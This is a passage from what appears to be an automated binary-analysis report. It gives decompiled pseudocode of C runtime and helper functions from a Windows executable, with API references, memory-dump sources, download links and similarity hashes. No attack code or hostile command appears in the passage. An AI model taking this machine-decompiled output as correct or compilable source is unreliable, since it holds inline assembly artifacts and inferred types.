                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID:
                • API String ID: 776569668-0
                • Opcode ID: 47c67bb6ac6dc7fd170de8bd6b40a79d5f713bdac9f6b7190701213f35d3a31d
                • Instruction ID: 6beeb7079fb06f6c1fdfdddbc79df00d48f9ea64d50941cb8809e154aba29e7b
                • Opcode Fuzzy Hash: 47c67bb6ac6dc7fd170de8bd6b40a79d5f713bdac9f6b7190701213f35d3a31d
                • Instruction Fuzzy Hash: AB11FC72948B04AAD664F7B1CC0BFCF779CAF04B40F40591DF79E66053DB69BA046A60
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 95%
                			E00CC1694(void* __ecx, void* __edx) {
                				void* _t4;
                				void* _t11;
                				void* _t16;
                				long _t26;
                				void* _t29;
                
                				if( *0xcdd680 != 0xffffffff) {
                					_t26 = GetLastError();
                					_t11 = E00CC288E(__eflags,  *0xcdd680);
                					__eflags = _t11 - 0xffffffff;
                					if(_t11 == 0xffffffff) {
                						L5:
                						_t11 = 0;
                					} else {
                						__eflags = _t11;
                						if(__eflags == 0) {
                							_t4 = E00CC28C8(__eflags,  *0xcdd680, 0xffffffff);
                							_pop(_t16);
                							__eflags = _t4;
                							if(_t4 != 0) {
                								_t29 = E00CC7B1B(_t16, 1, 0x28);
                								__eflags = _t29;
                								if(__eflags == 0) {
                									L8:
                									_t11 = 0;
                									E00CC28C8(__eflags,  *0xcdd680, 0);
                								} else {
                									__eflags = E00CC28C8(__eflags,  *0xcdd680, _t29);
                									if(__eflags != 0) {
                										_t11 = _t29;
                										_t29 = 0;
                										__eflags = 0;
                									} else {
                										goto L8;
                									}
                								}
                								E00CC7A50(_t29);
                							} else {
                								goto L5;
                							}
                						}
                					}
                					SetLastError(_t26);
                					return _t11;
                				} else {
                					return 0;
                				}
                			}

                APIs
                • GetLastError.KERNEL32(?,?,00CC168B,00CBF0E2), ref: 00CC16A2
                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00CC16B0
                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00CC16C9
                • SetLastError.KERNEL32(00000000,?,00CC168B,00CBF0E2), ref: 00CC171B
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: ErrorLastValue___vcrt_
                • String ID:
                • API String ID: 3852720340-0
                • Opcode ID: e085aa99e9b83ec6db756024ac4b6824a439012843201f6143c0242055760c2e
                • Instruction ID: e4399bfd908bc76df8d313c4b74b9f78cccbcd5e96c5a6c438fe705f650d3572
                • Opcode Fuzzy Hash: e085aa99e9b83ec6db756024ac4b6824a439012843201f6143c0242055760c2e
                • Instruction Fuzzy Hash: 0901D83364A2115FA7152A76FC85F1A6B58EB12375338062EF925851E3EF518C416294
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 77%
                			E00CBD27B() {
                				intOrPtr _t1;
                				_Unknown_base(*)()* _t3;
                				void* _t5;
                				_Unknown_base(*)()* _t6;
                				struct HINSTANCE__* _t14;
                
                				_t1 =  *0xcffe58;
                				if(_t1 != 1) {
                					if(_t1 == 0) {
                						_t14 = GetModuleHandleW(L"KERNEL32.DLL");
                						if(_t14 != 0) {
                							_t3 = GetProcAddress(_t14, "AcquireSRWLockExclusive");
                							if(_t3 == 0) {
                								goto L5;
                							} else {
                								 *0xcffe5c = _t3;
                								_t6 = GetProcAddress(_t14, "ReleaseSRWLockExclusive");
                								if(_t6 == 0) {
                									goto L5;
                								} else {
                									 *0xcffe60 = _t6;
                								}
                							}
                						} else {
                							L5:
                							_t14 = 1;
                						}
                						asm("lock cmpxchg [edx], ecx");
                						if(0 != 0 || _t14 != 1) {
                							if(0 != 1) {
                								_t5 = 1;
                							} else {
                								goto L12;
                							}
                						} else {
                							L12:
                							_t5 = 0;
                						}
                						return _t5;
                					} else {
                						return 1;
                					}
                				} else {
                					return 0;
                				}
                			}

                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID:
                • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                • API String ID: 0-1718035505
                • Opcode ID: e732297478465e230843e50b49df21ddfabf17950ecc5e4d3b3a1429d47982b4
                • Instruction ID: a6570837c326ba5ae147a29f7f686f3035af94b6dcf358bd6b98e07eb385c8ee
                • Opcode Fuzzy Hash: e732297478465e230843e50b49df21ddfabf17950ecc5e4d3b3a1429d47982b4
                • Instruction Fuzzy Hash: BF0121726412A34B4F212EA41C907EA6384DE12706710007BEA22C3210F721CD42DBA3
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 65%
                			E00CB0910(intOrPtr* __ecx, intOrPtr __edx, intOrPtr* _a4) {
                				char _v16;
                				struct _SYSTEMTIME _v32;
                				struct _SYSTEMTIME _v48;
                				struct _FILETIME _v64;
                				struct _FILETIME _v72;
                				intOrPtr _v76;
                				struct _FILETIME _v84;
                				intOrPtr _t47;
                				long _t61;
                				intOrPtr* _t66;
                				long _t72;
                				intOrPtr _t73;
                				intOrPtr* _t76;
                
                				_t73 = __edx;
                				_t66 = _a4;
                				_t76 = __ecx;
                				_v48.wYear =  *_t66;
                				_v48.wMonth =  *((intOrPtr*)(_t66 + 4));
                				_v48.wDay =  *((intOrPtr*)(_t66 + 8));
                				_v48.wHour =  *((intOrPtr*)(_t66 + 0xc));
                				_v48.wMinute =  *((intOrPtr*)(_t66 + 0x10));
                				_v48.wSecond =  *((intOrPtr*)(_t66 + 0x14));
                				_v48.wMilliseconds = 0;
                				_v48.wDayOfWeek.wYear = 0;
                				if(SystemTimeToFileTime( &_v48,  &_v64) == 0) {
                					 *_t76 = 0;
                					 *((intOrPtr*)(_t76 + 4)) = 0;
                				} else {
                					if(E00CAA995() >= 0x600) {
                						FileTimeToSystemTime( &_v64,  &_v32);
                						__imp__TzSpecificLocalTimeToSystemTime(0,  &_v32,  &_v16);
                						SystemTimeToFileTime( &(_v32.wDayOfWeek),  &_v84);
                						SystemTimeToFileTime( &(_v48.wDayOfWeek),  &(_v72.dwHighDateTime));
                						_t61 = _v84.dwHighDateTime + _v72.dwLowDateTime;
                						asm("sbb eax, [esp+0x24]");
                						asm("sbb eax, edi");
                						asm("adc eax, edi");
                						_t72 = 0 - _v72.dwHighDateTime.dwLowDateTime + _v84.dwLowDateTime + _v76;
                						asm("adc eax, edi");
                					} else {
                						LocalFileTimeToFileTime( &_v64,  &_v72);
                						_t61 = _v72.dwHighDateTime.dwLowDateTime;
                						_t72 = _v72.dwLowDateTime;
                					}
                					 *_t76 = E00CBDDC0(_t72, _t61, 0x64, 0);
                					 *((intOrPtr*)(_t76 + 4)) = _t73;
                				}
                				_t47 =  *((intOrPtr*)(_t66 + 0x18));
                				 *_t76 =  *_t76 + _t47;
                				asm("adc [esi+0x4], edi");
                				return _t47;
                			}

                APIs
                • SystemTimeToFileTime.KERNEL32(?,?), ref: 00CB096E
                  • Part of subcall function 00CAA995: GetVersionExW.KERNEL32(?), ref: 00CAA9BA
                • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00CB0990
                • FileTimeToSystemTime.KERNEL32(?,?), ref: 00CB09AA
                • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00CB09BB
                • SystemTimeToFileTime.KERNEL32(?,?), ref: 00CB09CB
                • SystemTimeToFileTime.KERNEL32(?,?), ref: 00CB09D7
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: Time$File$System$Local$SpecificVersion
                • String ID:
                • API String ID: 2092733347-0
                • Opcode ID: 7e23f4e81aeb350b1ee4423e91deafde4b7b414d4285997e43a12805817d13c7
                • Instruction ID: b513a2281873465d4c5e1cd2b8e7b1f63ec6645d4ce80c1b1ffa718bc1093b60
                • Opcode Fuzzy Hash: 7e23f4e81aeb350b1ee4423e91deafde4b7b414d4285997e43a12805817d13c7
                • Instruction Fuzzy Hash: 7B31D57A1083469AC700DFA5C9809ABB7E8FF98704F04491EF999C3210E730E549CB6A
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 96%
                			E00CB8BE2(signed int _a4, intOrPtr _a8, signed int* _a12) {
                				void* _t16;
                				signed int _t22;
                				void* _t25;
                				signed int _t30;
                				signed int* _t34;
                
                				_t34 = _a12;
                				if(_t34 != 0) {
                					_t32 = _a8;
                					_t25 = 0x10;
                					if(E00CBF3CA(_a8, 0xcd40bc, _t25) == 0) {
                						L13:
                						_t30 = _a4;
                						 *_t34 = _t30;
                						L14:
                						 *((intOrPtr*)( *_t30 + 4))(_t30);
                						_t16 = 0;
                						L16:
                						return _t16;
                					}
                					if(E00CBF3CA(_t32, 0xcd40fc, _t25) != 0) {
                						if(E00CBF3CA(_t32, 0xcd40dc, _t25) != 0) {
                							if(E00CBF3CA(_t32, 0xcd40ac, _t25) != 0) {
                								if(E00CBF3CA(_t32, 0xcd414c, _t25) != 0) {
                									if(E00CBF3CA(_t32, 0xcd409c, _t25) != 0) {
                										 *_t34 =  *_t34 & 0x00000000;
                										_t16 = 0x80004002;
                										goto L16;
                									}
                									goto L13;
                								}
                								_t30 = _a4;
                								_t22 = _t30 + 0x10;
                								L11:
                								asm("sbb ecx, ecx");
                								 *_t34 =  ~_t30 & _t22;
                								goto L14;
                							}
                							_t30 = _a4;
                							_t22 = _t30 + 0xc;
                							goto L11;
                						}
                						_t30 = _a4;
                						_t22 = _t30 + 8;
                						goto L11;
                					}
                					_t30 = _a4;
                					_t22 = _t30 + 4;
                					goto L11;
                				}
                				return 0x80004003;
                			}

                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: _memcmp
                • String ID:
                • API String ID: 2931989736-0
                • Opcode ID: 1804d93f716bafed0d629f04dff29be3461cdd658f921171c61a2f1723b1c687
                • Instruction ID: 3d6ae8913310238f2c9237205b6e3a7d9d4286d5968d91307468b9cf87899f94
                • Opcode Fuzzy Hash: 1804d93f716bafed0d629f04dff29be3461cdd658f921171c61a2f1723b1c687
                • Instruction Fuzzy Hash: 7321AAF164120AABDB189A11CC91FBBBBAC9F50784F14453AFE049B316F730ED49D6A1
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 72%
                			E00CC8516(void* __ebx, void* __ecx, void* __edx) {
                				void* __edi;
                				void* __esi;
                				intOrPtr _t2;
                				void* _t3;
                				void* _t4;
                				intOrPtr _t9;
                				void* _t11;
                				void* _t20;
                				void* _t21;
                				void* _t23;
                				void* _t25;
                				void* _t27;
                				void* _t29;
                				void* _t31;
                				void* _t32;
                				long _t36;
                				long _t37;
                				void* _t40;
                
                				_t29 = __edx;
                				_t23 = __ecx;
                				_t20 = __ebx;
                				_t36 = GetLastError();
                				_t2 =  *0xcdd6ac; // 0x6
                				_t42 = _t2 - 0xffffffff;
                				if(_t2 == 0xffffffff) {
                					L2:
                					_t3 = E00CC7B1B(_t23, 1, 0x364);
                					_t31 = _t3;
                					_pop(_t25);
                					if(_t31 != 0) {
                						_t4 = E00CC9BA9(_t25, _t36, __eflags,  *0xcdd6ac, _t31);
                						__eflags = _t4;
                						if(_t4 != 0) {
                							E00CC8388(_t25, _t31, 0xd00418);
                							E00CC7A50(0);
                							_t40 = _t40 + 0xc;
                							__eflags = _t31;
                							if(_t31 == 0) {
                								goto L9;
                							} else {
                								goto L8;
                							}
                						} else {
                							_push(_t31);
                							goto L4;
                						}
                					} else {
                						_push(_t3);
                						L4:
                						E00CC7A50();
                						_pop(_t25);
                						L9:
                						SetLastError(_t36);
                						E00CC7AD8(_t20, _t29, _t31, _t36);
                						asm("int3");
                						_push(_t20);
                						_push(_t36);
                						_push(_t31);
                						_t37 = GetLastError();
                						_t21 = 0;
                						_t9 =  *0xcdd6ac; // 0x6
                						_t45 = _t9 - 0xffffffff;
                						if(_t9 == 0xffffffff) {
                							L12:
                							_t32 = E00CC7B1B(_t25, 1, 0x364);
                							_pop(_t27);
                							if(_t32 != 0) {
                								_t11 = E00CC9BA9(_t27, _t37, __eflags,  *0xcdd6ac, _t32);
                								__eflags = _t11;
                								if(_t11 != 0) {
                									E00CC8388(_t27, _t32, 0xd00418);
                									E00CC7A50(_t21);
                									__eflags = _t32;
                									if(_t32 != 0) {
                										goto L19;
                									} else {
                										goto L18;
                									}
                								} else {
                									_push(_t32);
                									goto L14;
                								}
                							} else {
                								_push(_t21);
                								L14:
                								E00CC7A50();
                								L18:
                								SetLastError(_t37);
                							}
                						} else {
                							_t32 = E00CC9B53(_t25, _t37, _t45, _t9);
                							if(_t32 != 0) {
                								L19:
                								SetLastError(_t37);
                								_t21 = _t32;
                							} else {
                								goto L12;
                							}
                						}
                						return _t21;
                					}
                				} else {
                					_t31 = E00CC9B53(_t23, _t36, _t42, _t2);
                					if(_t31 != 0) {
                						L8:
                						SetLastError(_t36);
                						return _t31;
                					} else {
                						goto L2;
                					}
                				}
                			}

                APIs
                • GetLastError.KERNEL32(?,00CE00E0,00CC3394,00CE00E0,?,?,00CC2E0F,?,?,00CE00E0), ref: 00CC851A
                • _free.LIBCMT ref: 00CC854D
                • _free.LIBCMT ref: 00CC8575
                • SetLastError.KERNEL32(00000000,?,00CE00E0), ref: 00CC8582
                • SetLastError.KERNEL32(00000000,?,00CE00E0), ref: 00CC858E
                • _abort.LIBCMT ref: 00CC8594
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: ErrorLast$_free$_abort
                • String ID:
                • API String ID: 3160817290-0
                • Opcode ID: 2f6eae62e965c4682da372e8cb98e098b5ef7c8f02a499baabe0305d3b95a43e
                • Instruction ID: fd9bc203366e1e67eee4c3af8ee99557daa0e00a97659b224181e52a64a05d49
                • Opcode Fuzzy Hash: 2f6eae62e965c4682da372e8cb98e098b5ef7c8f02a499baabe0305d3b95a43e
                • Instruction Fuzzy Hash: 03F0C8355856006BE3153335FC4AF2F2759CFE1762B25021EF52993191EEB0CF06A560
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 83%
                			E00CBC2A7(void* __eflags, struct HWND__* _a4, intOrPtr _a8, signed short _a12, WCHAR* _a16) {
                				void* _t12;
                				WCHAR* _t16;
                				void* _t17;
                				struct HWND__* _t18;
                				intOrPtr _t19;
                				void* _t20;
                				signed short _t23;
                
                				_t16 = _a16;
                				_t23 = _a12;
                				_t19 = _a8;
                				_t18 = _a4;
                				if(E00CA12D7(_t17, _t18, _t19, _t23, _t16, L"RENAMEDLG", 0, 0) != 0) {
                					L10:
                					return 1;
                				}
                				_t20 = _t19 - 0x110;
                				if(_t20 == 0) {
                					 *0xcfde34 = _t16;
                					SetDlgItemTextW(_t18, 0x66, _t16);
                					SetDlgItemTextW(_t18, 0x68,  *0xcfde34);
                					goto L10;
                				}
                				if(_t20 != 1) {
                					L5:
                					return 0;
                				}
                				_t12 = (_t23 & 0x0000ffff) - 1;
                				if(_t12 == 0) {
                					GetDlgItemTextW(_t18, 0x68,  *0xcfde34, 0x800);
                					_push(1);
                					L7:
                					EndDialog(_t18, ??);
                					goto L10;
                				}
                				if(_t12 == 1) {
                					_push(0);
                					goto L7;
                				}
                				goto L5;
                			}











                APIs
                  • Part of subcall function 00CA12D7: GetDlgItem.USER32(00000000,00003021), ref: 00CA131B
                  • Part of subcall function 00CA12D7: SetWindowTextW.USER32(00000000,00CD22E4), ref: 00CA1331
                • EndDialog.USER32(?,00000001), ref: 00CBC2F2
                • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00CBC308
                • SetDlgItemTextW.USER32(?,00000066,?), ref: 00CBC322
                • SetDlgItemTextW.USER32(?,00000068), ref: 00CBC32D
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: ItemText$DialogWindow
                • String ID: RENAMEDLG
                • API String ID: 445417207-3299779563
                • Opcode ID: 2b9a93e9f1fd61d32b2282a2462b084fb5c74e8ba1eee63dccb5fc84a14d264e
                • Instruction ID: cecbc18129fe45e608f53e355e99518c2c831b6524fc3d13eb9346f54d5aa3b7
                • Opcode Fuzzy Hash: 2b9a93e9f1fd61d32b2282a2462b084fb5c74e8ba1eee63dccb5fc84a14d264e
                • Instruction Fuzzy Hash: EE014C33A812147AD6105FA95DC4FBB7B6CE79AB01F104016F343F61E0C2A2AD04D732
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 37%
                			E00CC6B78(void* __ecx, void* __esi, intOrPtr _a4) {
                				signed int _v8;
                				signed int _v12;
                				signed int _t10;
                				intOrPtr* _t20;
                				signed int _t22;
                
                				_t10 =  *0xcdd668; // 0x814d2927
                				_v8 = _t10 ^ _t22;
                				_v12 = _v12 & 0x00000000;
                				_t12 =  &_v12;
                				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t12, __ecx, __ecx);
                				if(_t12 != 0) {
                					_t20 = GetProcAddress(_v12, "CorExitProcess");
                					if(_t20 != 0) {
                						 *0xcd2260(_a4);
                						_t12 =  *_t20();
                					}
                				}
                				if(_v12 != 0) {
                					_t12 = FreeLibrary(_v12);
                				}
                				return E00CBE203(_t12, _v8 ^ _t22);
                			}









                APIs
                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00CC6B29,?,?,00CC6AC9,?,00CDA800,0000000C,00CC6C20,?,00000002), ref: 00CC6B98
                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00CC6BAB
                • FreeLibrary.KERNEL32(00000000,?,?,?,00CC6B29,?,?,00CC6AC9,?,00CDA800,0000000C,00CC6C20,?,00000002,00000000), ref: 00CC6BCE
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: AddressFreeHandleLibraryModuleProc
                • String ID: CorExitProcess$mscoree.dll
                • API String ID: 4061214504-1276376045
                • Opcode ID: 6b02a641fe5d1e997c8fec3e2461cc50f6162832371aeb107bc2faa7435e269d
                • Instruction ID: ae86dfee125baeec206da4b00c1fd581190f9a8d0f6750290ad4831eae248dd3
                • Opcode Fuzzy Hash: 6b02a641fe5d1e997c8fec3e2461cc50f6162832371aeb107bc2faa7435e269d
                • Instruction Fuzzy Hash: B3F04431A11219BBCB155B90DD09F9EFFB8EF44715F0000AAF905E2190DB705E44DB90
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00CAE7E3(struct HINSTANCE__** __ecx) {
                				void* _t5;
                				struct HINSTANCE__* _t6;
                				struct HINSTANCE__** _t9;
                
                				_t9 = __ecx;
                				if(__ecx[1] == 0) {
                					_t6 = E00CAFCFD(L"Crypt32.dll");
                					 *__ecx = _t6;
                					if(_t6 != 0) {
                						_t9[2] = GetProcAddress(_t6, "CryptProtectMemory");
                						_t6 = GetProcAddress( *_t9, "CryptUnprotectMemory");
                						_t9[3] = _t6;
                					}
                					_t9[1] = 1;
                					return _t6;
                				}
                				return _t5;
                			}







                APIs
                  • Part of subcall function 00CAFCFD: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00CAFD18
                  • Part of subcall function 00CAFCFD: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00CAE7F6,Crypt32.dll,?,00CAE878,?,00CAE85C,?,?,?,?), ref: 00CAFD3A
                • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00CAE802
                • GetProcAddress.KERNEL32(00CE7350,CryptUnprotectMemory), ref: 00CAE812
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: AddressProc$DirectoryLibraryLoadSystem
                • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                • API String ID: 2141747552-1753850145
                • Opcode ID: dd5288542c9bc25b20713505c1cc4e995f82c363855b8533817e550ba937165a
                • Instruction ID: cd376c680cbbbf6123d087f315ab4e7ced1d9dac713639cc603f90717fffda8f
                • Opcode Fuzzy Hash: dd5288542c9bc25b20713505c1cc4e995f82c363855b8533817e550ba937165a
                • Instruction Fuzzy Hash: 30E04FB0541743AADB106B799808705FBA4AF61714B10C137B524D3291DBB4D051CB70
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 83%
                			E00CC7389(signed int* __ecx, signed int __edx) {
                				signed int _v8;
                				intOrPtr* _v12;
                				signed int _v16;
                				signed int _t28;
                				signed int _t29;
                				intOrPtr _t33;
                				signed int _t37;
                				signed int _t38;
                				signed int _t40;
                				void* _t50;
                				signed int _t56;
                				intOrPtr* _t57;
                				signed int _t68;
                				signed int _t71;
                				signed int _t72;
                				signed int _t74;
                				signed int _t75;
                				signed int _t78;
                				signed int _t80;
                				signed int* _t81;
                				signed int _t85;
                				void* _t86;
                
                				_t72 = __edx;
                				_v12 = __ecx;
                				_t28 =  *__ecx;
                				_t81 =  *_t28;
                				if(_t81 != 0) {
                					_t29 =  *0xcdd668; // 0x814d2927
                					_t56 =  *_t81 ^ _t29;
                					_t78 = _t81[1] ^ _t29;
                					_t83 = _t81[2] ^ _t29;
                					asm("ror edi, cl");
                					asm("ror esi, cl");
                					asm("ror ebx, cl");
                					if(_t78 != _t83) {
                						L14:
                						 *_t78 = E00CC69A8( *((intOrPtr*)( *((intOrPtr*)(_v12 + 4)))));
                						_t33 = E00CBDB10(_t56);
                						_t57 = _v12;
                						 *((intOrPtr*)( *((intOrPtr*)( *_t57)))) = _t33;
                						_t24 = _t78 + 4; // 0x4
                						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 4)) = E00CBDB10(_t24);
                						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 8)) = E00CBDB10(_t83);
                						_t37 = 0;
                						L15:
                						return _t37;
                					}
                					_t38 = 0x200;
                					_t85 = _t83 - _t56 >> 2;
                					if(_t85 <= 0x200) {
                						_t38 = _t85;
                					}
                					_t80 = _t38 + _t85;
                					if(_t80 == 0) {
                						_t80 = 0x20;
                					}
                					if(_t80 < _t85) {
                						L9:
                						_push(4);
                						_t80 = _t85 + 4;
                						_push(_t80);
                						_v8 = E00CCAC29(_t56);
                						_t40 = E00CC7A50(0);
                						_t68 = _v8;
                						_t86 = _t86 + 0x10;
                						if(_t68 != 0) {
                							goto L11;
                						}
                						_t37 = _t40 | 0xffffffff;
                						goto L15;
                					} else {
                						_push(4);
                						_push(_t80);
                						_v8 = E00CCAC29(_t56);
                						E00CC7A50(0);
                						_t68 = _v8;
                						_t86 = _t86 + 0x10;
                						if(_t68 != 0) {
                							L11:
                							_t56 = _t68;
                							_v8 = _t68 + _t85 * 4;
                							_t83 = _t68 + _t80 * 4;
                							_t78 = _v8;
                							_push(0x20);
                							asm("ror eax, cl");
                							_t71 = _t78;
                							_v16 = 0 ^  *0xcdd668;
                							asm("sbb edx, edx");
                							_t74 =  !_t72 & _t68 + _t80 * 0x00000004 - _t78 + 0x00000003 >> 0x00000002;
                							_v8 = _t74;
                							if(_t74 == 0) {
                								goto L14;
                							}
                							_t75 = _v16;
                							_t50 = 0;
                							do {
                								_t50 = _t50 + 1;
                								 *_t71 = _t75;
                								_t71 = _t71 + 4;
                							} while (_t50 != _v8);
                							goto L14;
                						}
                						goto L9;
                					}
                				}
                				return _t28 | 0xffffffff;
                			}


























                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: _free
                • String ID:
                • API String ID: 269201875-0
                • Opcode ID: ed440352e0ee4c6212e60e30ed2c60c2fb7b1d3513cd7abcb1525b827791e54b
                • Instruction ID: 47c4f5e94018a79a430bb5ff42a743b9cc824f09f1864591a1c3d940430aa2a1
                • Opcode Fuzzy Hash: ed440352e0ee4c6212e60e30ed2c60c2fb7b1d3513cd7abcb1525b827791e54b
                • Instruction Fuzzy Hash: 8E418F36A002049FCB14DF78C881F5EB7A6EF89714F1546ADE526EB291D631AE01DF81
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 93%
                			E00CCABA6() {
                				int _v8;
                				void* __ecx;
                				void* _t6;
                				int _t7;
                				char* _t13;
                				int _t17;
                				void* _t19;
                				char* _t25;
                				WCHAR* _t27;
                
                				_t27 = GetEnvironmentStringsW();
                				if(_t27 == 0) {
                					L7:
                					_t13 = 0;
                				} else {
                					_t6 = E00CCAB6F(_t27);
                					_pop(_t19);
                					_t17 = _t6 - _t27 >> 1;
                					_t7 = WideCharToMultiByte(0, 0, _t27, _t17, 0, 0, 0, 0);
                					_v8 = _t7;
                					if(_t7 == 0) {
                						goto L7;
                					} else {
